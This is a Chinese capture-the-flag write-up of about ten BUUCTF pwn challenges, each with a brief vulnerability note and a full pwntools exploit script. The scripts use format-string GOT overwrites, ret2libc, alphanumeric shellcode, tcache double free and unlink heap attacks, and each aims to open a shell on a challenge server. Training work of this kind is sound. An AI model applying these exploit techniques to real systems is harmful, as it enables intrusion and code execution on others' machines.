BUUCTF-pwn(11)
2024-04-07 01:50:59
mrctf2020_easy_equation
简单的栈溢出漏洞,格式化字符串漏洞!此处采用栈溢出漏洞!
axb_2019_fmt64
经典循环格式化字符串64位漏洞!
唯一注意的地方pwntools的FmtStr_payload无法成功获取权限!需要手动计算字节进行攻击!
from elftools.construct.macros import Padding
from pwn import *
from LibcSearcher import *
context(log_level='debug',os='linux',arch='amd64')binary = './axb_2019_fmt64'
r = remote('node4.buuoj.cn',29901)
#r = process(binary)
elf = ELF(binary)
printf_got = elf.got['printf']
strlen_got = elf.got['strlen']
read_got = elf.got['read']def leak(payload):r.send(payload)return r.recv()r.recvuntil("Please tell me:")
#leak(b'aaaaaaaa.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.'+p64(0)+b'cccccccc')
'''fmt = FmtStr(leak,numbwritten=9)
offset = fmt.offset'''
offset = 8
#gdb.attach(r)
r.send(b'aaaaaaaa.%11$sdd'+p64(0)+p64(read_got))
r.recvuntil(b"aaaaaaaa.")
read_addr = u64(r.recv(6).ljust(8,b'\x00'))
libc = LibcSearcher('read',read_addr)
libc_base = read_addr-libc.dump('read')
system = libc_base+libc.dump('system')
sh = libc_base+libc.dump('str_bin_sh')
log.info("read_addr -> "+hex(read_addr))
log.info("system -> "+hex(system))
#payload = fmtstr_payload(6,{strlen_got:system},numbwritten=9,write_size='byte')
high = (system & 0xff0000)//0x10000
low = (system & 0xffff)
print(high,low)
payload = '%'+str(high-9)+'c%12$hhn'+'%'+str(low-high)+'c%13$hn'
payload = bytes(payload,encoding='utf-8')+b'c'*(32-len(payload))+p64(strlen_got+2)+p64(strlen_got)
print(payload)
r.send(payload)
r.recvuntil("Please tell me:")
r.send(b';/bin/sh\x00')r.interactive()
x_ctf_b0verfl0w
无保护的栈溢出漏洞!
from re import L
from pwn import *
from LibcSearcher import *
context(log_level='debug',os='linux',arch='i386')binary = './b0verfl0w'
r = remote('node4.buuoj.cn',29177)
#r = process(binary)
elf = ELF(binary)
main = elf.symbols['main']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']r.recvuntil("What's your name?\n")
payload = b'a'*0x24+p32(puts_plt)+p32(main)+p32(puts_got)
r.sendline(payload)
puts_addr = u32(r.recvuntil('\xf7')[-4:])
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr-libc.dump('puts')
system = libc_base+libc.dump('system')
sh = libc_base+libc.dump('str_bin_sh')
log.info("puts_addr -> "+hex(puts_addr))
log.info("libc_base -> "+hex(libc_base))
payload2 = b'a'*0x24+p32(system)+p32(main)+p32(sh)
r.sendline(payload2)r.interactive()
suctf_2018_basic pwn
同样栈溢出漏洞!
from pwn import *
context(log_level='debug',os='linux',arch='amd64')binary = './SUCTF_2018_basic_pwn'
r = remote('node4.buuoj.cn',27378)
#r = process(binary)
elf = ELF(binary)
binsh = 0x0401157
payload = b'a'*0x118+p64(binsh)
r.sendline(payload)r.interactive()
mrctf2020_shellcode_revenge
此时ida无法对main函数进行反汇编到伪C代码,故采用cutter工具进行反汇编!
可以发现没有开启NX保护措施,但是却不存在栈溢出漏洞。
即开始排查是否存在除数字字母外字符。故查询资料,发现alpha3可以满足我们的条件!
git clone https://github.com/TaQini/alpha3.git
from pwn import *
context(log_level='debug',os='linux',arch='amd64')binary = './mrctf2020_shellcode_revenge'
r = remote('node4.buuoj.cn',25264)
#r = process(binary)
elf = ELF(binary)'''r.recvuntil("Show me your magic!\n")
r.sendline(shellcode)'''
r.send("Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t")r.interactive()
ciscn_2019_es_1
分析主要函数
Allocate申请函数!
Show打印函数
Free释放函数,存在UAF漏洞!
本题较为简单,libc为2.27,存在tcache,且有UAF漏洞,故可以double free,进而达到任意地址写。不过满保护保护,即无法写入got表,故可以写入malloc_hook,但经过实践发现malloc_hook存放one_gadget无法获取权限,从而思考realloc_hook的方法,但依然不行,故写入free_hook中!
from pwn import *
context(log_level='debug',os='linux',arch='amd64')binary = './ciscn_2019_es_1'
r = remote('node4.buuoj.cn',26708)
#r = process(binary)
elf = ELF(binary)
libc = ELF('./libc-2.27.so')
def Allocate(size=0x18,payload='\n'):r.sendlineafter("choice:",'1')r.sendlineafter("Please input the size of compary's name",str(size))r.sendafter("please input name:",payload)r.sendafter("please input compary call:",b'/bin/sh\x00')def Show(index):r.sendlineafter("choice:",'2')r.sendlineafter("Please input the index:",str(index))def Free(index):r.sendlineafter("choice:",'3')r.sendlineafter("Please input the index:",str(index))Allocate(0x410)#0
Allocate(0x60)#1
Allocate()#2Free(1)
Free(1)#double free
Free(0)
Show(0)
main_arena = u64(r.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))-96
libc_base = main_arena-0x10-libc.symbols['__malloc_hook']#-0x3EBC40
realloc = libc_base+libc.symbols['__libc_realloc']#+0x98C30
free = libc_base+libc.symbols['__free_hook']#+0x3ED8E8
one = [0x4f2c5,0x4f322,0x10a38c,0x4f2c5,0x4f322,0x10a38c]
log.info("main_arena -> "+hex(main_arena))
log.info("libc_base -> "+hex(libc_base))
log.info("free_hook -> "+hex(free))
Allocate(0x60,p64(free))#3
Allocate(0x60,p64(free))#4
Allocate(0x60,p64(one[4]+libc_base))#5#gdb.attach(r)
#r.sendlineafter("choice:",'1')
Free(2)r.interactive()
picoctf_2018_leak_me
简单的泄露!
from pwn import *
context(log_level='debug',os='linux',arch='i386')binary = './PicoCTF_2018_leak-me'
r = remote("node4.buuoj.cn",29362)
#r = process(binary)
elf = ELF(binary)name = 'njh'#b'a'*0xf8+b'c'*0x8
r.sendlineafter("What is your name?",name)
#r.recvuntil(b"ccccccc,")
#passwd = r.recvline()[:-1]
#r.recvuntil("Please Enter the Password.\n")
sleep(0.1)
r.sendline(b'a_reAllY_s3cuRe_p4s$word_f85406')r.interactive()
inndy_echo
简单的格式化字符串漏洞,且为32位!直接使用pwntools集成格式化自动工具即可!
from re import L
from pwn import *
context(log_level='debug',os='linux',arch='i386')binary = './echo'
r = remote('node4.buuoj.cn',28025)
#r = process(binary)
elf = ELF(binary)
printf_got = elf.got['printf']
system = elf.symbols['system']
def leak(payload):r.sendline(payload)return r.recv()fmt = FmtStr(leak)
offset = fmt.offset#7
log.warn("offset -> "+str(offset))
payload = fmtstr_payload(offset,{printf_got:system})
r.sendline(payload)
sleep(0.1)
r.sendline(b'/bin/sh\x00')r.interactive()
hitcontraining_unlink
分析主要函数!
Allocate申请函数,读入内容时最后一位设置成了\x00,存在截断
Show打印函数,遇到\x00结束
Edit编辑函数,存在堆溢出漏洞!
Free释放函数,不存在UAF等漏洞!
本题较为简单,题目名为Unlink,故采取Unlink手法进行攻击(存在bss段全局变量),便可以得到任意地址写!本题采用覆写free_got表的方法进行,但需要注意free_got与puts_got响铃,截断会破坏puts_got,需注意不能破坏puts_got,否则无法获取权限!
from pwn import *
context(log_level='debug',os='linux',arch='amd64')binary = './bamboobox'
r = remote('node4.buuoj.cn',26559)
#r = process(binary)
elf = ELF(binary)
libc = ELF('./libc.so')
free_got = elf.got['free']
malloc_got = elf.got['malloc']
bss_addr = 0x06020C8
def Allocate(size=0x18,payload='\n'):r.sendlineafter("Your choice:",'2')r.sendlineafter("Please enter the length of item name:",str(size))r.sendafter("Please enter the name of item:",payload)def Show():r.sendlineafter("Your choice:",'1')def Edit(index,payload):r.sendlineafter("Your choice:",'3')r.sendlineafter("Please enter the index of item:",str(index))r.sendlineafter("Please enter the length of item name:",str(len(payload)))r.sendafter("Please enter the new name of the item:",payload)def Free(index):r.sendlineafter("Your choice:",'4')r.sendlineafter("Please enter the index of item:",str(index))def Exit():r.sendlineafter("Your choice:",'5')Allocate(0x80)#0
Allocate()#1
Allocate(0x80)#2
Allocate()#3
Allocate(0x18,b'/bin/sh\x00')#4target = bss_addr
fd = target-0x18
bk = target-0x10
Edit(0,p64(0)+p64(0xa1)+p64(fd)+p64(bk))
Edit(1,b'a'*0x10+p64(0xa0)+p64(0x90))
Free(2)#UnlinkAllocate(0x70)#2
Show()
r.recvuntil("1 : ")
main_arenea = u64(r.recv(6).ljust(8,b'\x00'))-88
libc_base = main_arenea-0x10-libc.symbols['__malloc_hook']#-0x3C3B20
system = libc_base+libc.symbols['system']#+0x45380
puts = libc_base+libc.symbols['puts']#+0x6F5D0
log.info("main_arena -> "+hex(main_arenea))
log.warn("libc_base -> "+hex(libc_base))one = [0x45206,0x4525a,0xef9f4,0xf0897]
Edit(0,b'a'*0x18+p64(target)+b'a'*8+p64(free_got))#gdb.attach(r)
Edit(1,p64(system)+p64(puts))
Free(4)r.interactive()
axb_2019_brop64
简单64位栈溢出漏洞,ret2libc!
from pwn import *
from LibcSearcher import *
context(log_level='debug',os='linux',arch='amd64')binary = './axb_2019_brop64'
r = remote('node4.buuoj.cn',26284)
#r = process(binary)
elf = ELF(binary)
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pop_rdi_ret = 0x0400963
start = 0x04006E0r.recvuntil("Please tell me:")
payload = b'a'*0xd8+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(start)
r.sendline(payload)
puts_addr = u64(r.recvuntil('\n')[-7:-1].ljust(8,b'\x00'))
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr-libc.dump('puts')
system = libc_base+libc.dump('system')
sh = libc_base+libc.dump('str_bin_sh')
log.warn("puts_addr -> "+hex(puts_addr))payload2 = b'a'*0xd8+p64(pop_rdi_ret)+p64(sh)+p64(system)+p64(start)
r.sendline(payload2)r.interactive()
BUUCTF-pwn(11)相关推荐
- 持续更新 BUUCTF——PWN(一)
文章目录 前言 test_your_nc rip warmup_csaw_2016 ciscn_2019_n_1 pwn1_sctf_2016 jarvisoj_level0 [第五空间2019 决赛 ...
- BUUCTF Pwn warmup
BUUCTF Pwn warmup 1.题目下载地址 2.checksec检查保护 3.IDA静态分析 4.exp 1.题目下载地址 点击下载题目 2.checksec检查保护 啥都没开,果然是war ...
- BUUCTF PWN rip1 WP
BUUCTF PWN rip 1 这是一个WP,也是一个自己练习过程的记录. 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后 ...
- buuctf pwn bjdctf_2020_babyrop
buuctf pwn bjdctf_2020_babyrop 1.checksec 2.IDA分析 ropper 3.exp 1.checksec 运行一下 2.IDA分析 这里调用了vuln函数 我 ...
- 持续更新 BUUCTF——PWN(二)
文章目录 前言 0ctf_2017_babyheap ciscn_2019_s_9 hitcon2014_stkof roarctf_2019_easy_pwn picoctf_2018_shellc ...
- BUUCTF(pwn)jarvisoj_fm --格式化字符串漏洞
简单的格式化字符串漏洞题目 32位,开启了canary和nx保护 知道以上条件就可以计算偏移了 得到偏移为11 from pwn import *r=remote('node3.buuoj.cn',2 ...
- buuctf pwn wp(第四波)格式化字符串漏洞系列
这里是一个总的分类,一个类型的第一道题目会详细介绍,后面的类型相同的会简略介绍(不过这是第一波,都是最简单的,原理可以看我前面的文章,后面难一点的题目我再讲原理.) 这一波题都是无脑AAAA的类型,它 ...
- BUUCTF PWN 刷题 1-15题
1 rip 经典栈溢出漏洞. from pwn import *p = remote('node4.buuoj.cn', 27181)payload = b'a' * 23 + p64(0x40118 ...
- BUUCTF pwn
第一道: 第一步:连接nc靶场 第二步:连接靶场后,执行 ls 命令,展示该靶场下目录文件. 第三步:里有个 flag文件 使用 cat命令进行查看. 得到flag nc命令详解 第二道: 第一步:下 ...
- BUUCTF pwn wp 76 - 80
cmcc_pwnme2 int __cdecl userfunction(char *src) {char dest[108]; // [esp+Ch] [ebp-6Ch] BYREFstrcpy(d ...
最新文章
- 电脑上如何下载python-如何下载python并正确安装
- python怎么判断是不是汉字危机_谈 Python 的中文编码处理
- 手把手教你用java完成文件、图片下载
- Android开发之 Android 的基本组件的概述
- BZOJ 2754 喵星球上的点名(后缀数组)
- wke升级vs2010,vs2013
- 离散数学 习题篇 —— 集合相等与子集关系判断
- 史上最好用的GIF工具——ScreenToGif
- 2022软考高项-知识点速记更新版(顺口溜)
- 为什么程序员不需要MATLAB技能?
- 内存耗尽后Redis会发生什么
- RESTFul:RESTful简介、RESTful的实现、RESTFul案例
- springdata数据源的配置
- 计算机论文分类号 tp,论文编码(原论文分类号):TP39.doc
- 国内比较有实力的调查研究咨询公司
- 智能|智能仓储就是无人仓库吗?正确理解很重要
- 漏洞复现_CVE-2017-0144 “永恒之蓝”漏洞
- android 查看包名 脚本,Monkeyscript---获取包名主界面名和位置坐标
- PHPCMS任意文件下载之exp编写
- ADSL宽带路由器实现外网访问公司内网服务器_ 路由交换